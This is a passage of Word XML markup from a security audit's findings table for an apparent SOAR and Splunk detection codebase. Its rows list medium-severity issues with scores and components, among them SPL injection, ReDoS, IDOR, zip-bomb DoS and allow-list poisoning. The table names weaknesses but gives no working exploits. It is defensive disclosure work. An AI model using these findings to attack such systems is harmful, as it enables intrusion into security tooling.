              </w:rPr>
              <w:t>New-IP and spike detections write their own allow-list from attacker-influenced events (self-poisoning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Raw IP address passed as the whole Splunk/Carbon Black query (hunting.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>End-of-life components: Splunk 9.3 test image (EOL 2026-07-24), Python 3.10 CI runtime (EOL 2026-10-01), legacy SOAR exports, notebook stacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>regex_filter_list uses prefix-anchored re.match for keep/drop filtering (allow-list bypass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>container_merge: unauthorised close/merge/evidence on attacker-influenced container IDs (IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-controlled e-mail Message-ID drives tenant-wide search, delete and restore (MS Graph, Gmail)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>zip_extract: uncapped decompression (zip-bomb DoS) and no temp cleanup; Zip-Slip not exploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ReDoS via user-supplied regex compiled in regex_filter_list and regex_split</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>regex_extract_email: polynomial backtracking and incorrect extraction of attacker-controlled domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>XML parsing of remote responses without defusedxml and HTTP requests without timeout (ta_update.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection in potential_password_in_username via attacker-chosen username passed through map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Previously-seen baselines and their consumers form an allow-list poisoning path (30 files)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Case-sensitive match()/LIKE on attacker-controlled fields allows trivial bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded placeholder domain internal_test_email.com ships as live detection logic (dead detections)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
